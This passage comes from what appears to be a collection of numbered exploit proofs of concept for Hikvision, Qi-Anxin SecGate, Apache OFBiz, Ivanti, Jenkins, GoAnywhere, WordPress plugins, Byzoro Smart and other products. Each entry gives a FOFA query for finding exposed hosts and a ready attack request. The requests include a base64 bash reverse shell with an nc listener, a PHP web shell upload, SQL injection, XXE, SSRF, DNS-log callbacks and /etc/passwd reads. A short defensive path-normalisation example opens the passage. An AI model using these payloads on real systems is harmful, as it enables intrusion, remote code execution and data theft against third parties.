User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

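Entries 68 and 69 (wf_printnum.jsp;.js), 89 (editflow_manager.js%70) and 91 (/center/api/task/..;/orgManage/...) all defeat a front-end matcher that compares the raw request line against its rules, because the servlet container behind it normalises the path before routing. A proxy or WAF that wants to make the same decision as the application has to normalise the same way first. The block below is an added example for this edit, not code from the source or from Tomcat: it reproduces Tomcat-style path handling (per segment, drop everything from ';', percent-decode once, then resolve '.' and '..'), refuses the ambiguous cases (encoded slash or backslash, control characters) so a caller can fail closed, and contrasts a raw-path deny rule with the same rule applied after normalisation. The deny rules are hypothetical.

```python
"""Canonicalise a request path the way a servlet container does, then match (added example)."""
from urllib.parse import unquote


def canonical_path(raw_path: str) -> str:
    """Tomcat-style normalisation of the path part of a request target.

    Per segment: strip ';param' (path parameters), percent-decode exactly once,
    then resolve '.' and '..'. Raises ValueError for an encoded slash/backslash
    or a control character, cases where proxies and containers tend to disagree."""
    path = raw_path.split("?", 1)[0]  # the query string is not part of the path
    segments = []
    for seg in path.split("/"):
        seg = unquote(seg.split(";", 1)[0])
        if "/" in seg or "\\" in seg or any(ord(c) < 32 for c in seg):
            raise ValueError(f"refusing ambiguous segment {seg!r}")
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


# Hypothetical deny rules a reverse proxy in front of these applications might carry.
DENY_PREFIXES = ("/center/api/orgManage/",)
DENY_SUFFIXES = (".jsp",)


def naive_blocked(raw_path: str) -> bool:
    """What a matcher that only strips the query string and compares the raw path decides."""
    p = raw_path.split("?", 1)[0]
    return p.startswith(DENY_PREFIXES) or p.endswith(DENY_SUFFIXES)


def is_blocked(raw_path: str) -> bool:
    """The same rules after canonicalisation; anything the normaliser rejects is blocked."""
    try:
        p = canonical_path(raw_path)
    except ValueError:
        return True
    return p.startswith(DENY_PREFIXES) or p.endswith(DENY_SUFFIXES)


# Constructed inputs: the request targets from entries 68, 89 and 91 above.
PROBES = (
    "/defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1",
    "/sysform/003/editflow_manager.js%70",
    "/center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd",
)

if __name__ == "__main__":
    for raw in PROBES:
        print(f"{raw}\n  -> {canonical_path(raw)}  raw-match blocks: {naive_blocked(raw)}  canonical-match blocks: {is_blocked(raw)}")
```

Decoding exactly once is deliberate: a matcher that keeps decoding until the value stops changing will turn %2570 into p and so block more than the application, while one that never decodes blocks less; either gap is a bypass in one direction. The fileName=../../../../etc/passwd part of entry 91 is a separate problem (a query parameter used as a filesystem path) and is not addressed by path normalisation.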
92. Hikvision (海康威视) operations management center session command execution
Fastjson deserialization command execution through /center/api/session; the command is carried in the Testcmd header and the JSON body is omitted as PAYLOAD.
Hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"

POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. Qi-Anxin (奇安信) Legendsec (网神) SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
The anti-virus signature import handler stores the upfile part under /attachements/ with its original name and no authentication.

POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

Then fetch the uploaded file:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi'anxin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (Yingkeshi) HD smart recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated admin account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "[value obtained in step 1]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Byzoro Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Byzoro Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Byzoro Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

File path: /upload/2.php

121. Beijing Byzoro Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo (北京百绰智能) S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The value sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
